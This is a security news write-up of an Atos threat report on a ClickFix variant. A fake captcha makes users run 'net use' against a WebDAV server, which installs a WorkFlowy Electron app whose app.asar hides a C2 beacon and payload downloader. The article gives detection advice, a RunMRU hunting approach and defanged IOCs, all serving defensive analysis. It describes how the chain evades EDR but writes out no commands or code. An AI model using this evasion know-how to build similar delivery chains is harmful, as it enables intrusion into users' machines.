New ClickFix Variant Uses WebDAV and Legitimate WorkFlowy App to Evade Detection

Security researchers from Atos have identified a concerning evolution in the ClickFix attack technique, where attackers are combining multiple methods to bypass modern security controls and evade detection. This new variant demonstrates how adversaries continue to adapt their tactics, moving beyond commonly abused scripting engines to leverage native Windows utilities and legitimate applications for malicious purposes.

The Evolution of ClickFix

ClickFix attacks, which trick users into executing commands through the Windows Run dialog (Win+R), have been a persistent threat. Previous variants typically relied on PowerShell, MSHTA, or other scripting interpreters that are heavily monitored by modern EDR solutions. This new variant represents a significant shift in tactics.

"This ClickFix variant is significant because it moves initial access away from commonly abused scripting and execution engines such as PowerShell, MSHTA, and WScript, and instead relies on net use to abuse WebDAV as a delivery mechanism," explains Atos researchers in their threat report. "Previous ClickFix campaigns typically exposed themselves by directly invoking interpreters or living-off-the-land binaries that are heavily monitored by modern EDR solutions."

Attack Flow and Technique

The attack begins with a phishing page posing as a captcha mechanism at "happyglamper[.]ro" that prompts users to execute commands via the Run dialog. This executes a command that uses "net use" to map a network drive from an external server, then executes a batch file hosted on that drive.

The executed batch file downloads a ZIP archive containing a trojanized version of the legitimate WorkFlowy application. Here's where the attack becomes particularly sophisticated:

1. The attackers replaced the legitimate resources/app.asar file in the WorkFlowy application with a malicious version
2. The malicious code runs in the Node.js main process of the Electron application, outside the Chromium sandbox
3. This gives the malware full privileges of the logged-in user
4. The malicious code includes a C2 beacon that communicates with a server every 2 seconds
5. It also includes functionality to download and execute additional payloads from the C2 server

Why This Approach is Effective

"The malicious logic is hidden by replacing the content of the Workflowy application's app.asar archive with a trojanized version of main.js," the researchers note. "Because the code runs inside the Electron main process and remains packaged within a legitimate application, it avoids many file-based and behavioral detections that focus on standalone loaders or script interpreters. ASAR archives are rarely inspected, allowing the dropper logic to execute through normal application startup with minimal visibility."

Electron applications, which use web technologies packaged in .asar archives, present an attractive delivery mechanism for attackers. The malicious code runs with full Node.js privileges immediately on application launch, before the legitimate application code can execute.

Detection Challenges and Hunting Approach

Perhaps most concerning is that this attack was not detected by Microsoft Defender for Endpoint. Atos security teams only identified it through targeted threat hunting focused on the RunMRU registry key, which records commands executed through the Run dialog.

"This activity was not detected by security controls and was only identified through targeted threat hunting at Atos," the researchers state. "Detection relied on analyzing execution context rather than payload indicators, specifically hunting for suspicious command execution originating from the Explorer Run dialog."

The hunting query they developed looks for suspicious command interpreters and living-off-the-land binaries written into the Explorer RunMRU registry key with explorer.exe as the initiating process. This approach focuses on the behavioral aspect of the ClickFix technique rather than trying to detect specific payloads.

Practical Defense Recommendations

Based on this research, security teams should consider the following defensive measures:

1. Monitor RunMRU registry activity: Implement detection for suspicious commands executed via the Run dialog, particularly those involving networking utilities like net use
2. Enhance inspection of Electron applications: Consider adding detection for suspicious modifications to .asar files in Electron applications
3. Implement network traffic analysis: Look for unusual connections to cloud services, especially those with short, regular intervals
4. Expand threat hunting programs: Develop hypotheses based on adversary TTPs rather than just IOCs
5. User education: Train users to be cautious of prompts asking them to execute commands via the Run dialog

IOCs and Further Reading

For organizations looking to detect this specific threat, Atos has provided the following IOCs:

• Domain: happyglamper[.]ro
• Domain: cloudflare[.]report
• IP: 94[.]156[.]170[.]255
• IP: 144[].31[.]165[.]173
• File: %APPDATA%\id.txt
• SHA256: a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar)

The complete report with additional technical details and hunting queries can be found on the Atos CyberShield blog.

This new ClickFix variant serves as a reminder that adversaries continue to evolve their techniques, combining multiple methods to bypass security controls. As defensive technologies advance, attackers adapt by moving to less monitored techniques and abusing legitimate applications and system utilities. This underscores the importance of comprehensive defense strategies that include both preventive controls and proactive threat hunting capabilities.